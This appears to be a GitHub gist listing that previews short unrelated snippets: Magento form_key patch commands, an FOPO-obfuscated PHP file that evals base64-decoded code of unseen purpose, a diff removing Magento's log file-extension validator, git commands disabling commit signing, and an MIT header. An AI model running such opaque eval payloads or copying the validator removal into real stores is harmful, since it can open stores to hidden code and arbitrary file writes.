This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find -L app/design/frontend -regex '.*\(shipping\|billing\|shipping_method\|payment\).phtml' -exec grep -L formkey {} \; \ | |
| | xargs sed -i 's/<\/form>/<?php echo $this->getBlockHtml("formkey") ?><\/form>/g' | |
| find -L skin/frontend -name 'opcheckout.js' -exec grep -L form_key {} \; \ | |
| | xargs sed -i 's/if (elements\[i\].name=='\''payment\[method\]'\'') {/if (elements[i].name=='\''payment[method]'\'' || elements[i].name == '\''form_key'\'') {/g' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ | |
| This code was created on Monday, May 30th, 2016 at 10:02 UTC from IP 45.55.140.251 | |
| Checksum: c78b53f01c8146db93289b678994fb440fed7cb2 | |
| */ | |
| $n7c69914="\142\141\163\x65\x36\64\137\144\145\143\157\144\145";@eval($n7c69914( | |
| "Ly9OTjJOOGE5R2lzdWRyNlVrTWh5aGV2K0JPOUx3eFcyd3c2cFpQN0RYYzZTTkpPb3BaTTR1TkhKYjh | |
| 2b2lLbmhvblMrdjA4dHRlSHJyMkd6S2hCc2habjFCelBjYmRjSEN1WFUyNlBIb1UxOWs0RGxJRE5LQmx | |
| TRGFxbnEvanRoNFFUSUpHMHRwOGZHTmY4VUNxU3RFSExTeFZPRFNPcnljVGJkOFdBOTQzb2M1dXZYeWd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/app/Mage.php b/app/Mage.php | |
| index 0e650eebb4f..9c18e222689 100644 | |
| --- a/app/Mage.php | |
| +++ b/app/Mage.php | |
| @@ -798,9 +798,9 @@ public static function log($message, $level = null, $file = '', $forceLog = fals | |
| ',', | |
| (string) self::getConfig()->getNode('dev/log/allowedFileExtensions', Mage_Core_Model_Store::DEFAULT_CODE) | |
| ); | |
| - $logValidator = new Zend_Validate_File_Extension($_allowedFileExtensions); | |
| $logDir = self::getBaseDir('var') . DS . 'log'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Write local | |
| git config --local commit.gpgsign false | |
| # Read local (if never set, can be an empty value) | |
| git config --local commit.gpgsign |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| MIT License | |
| Copyright (c) 2021 Noé Charron | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal | |
| in the Software without restriction, including without limitation the rights | |
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| copies of the Software, and to permit persons to whom the Software is |
OlderNewer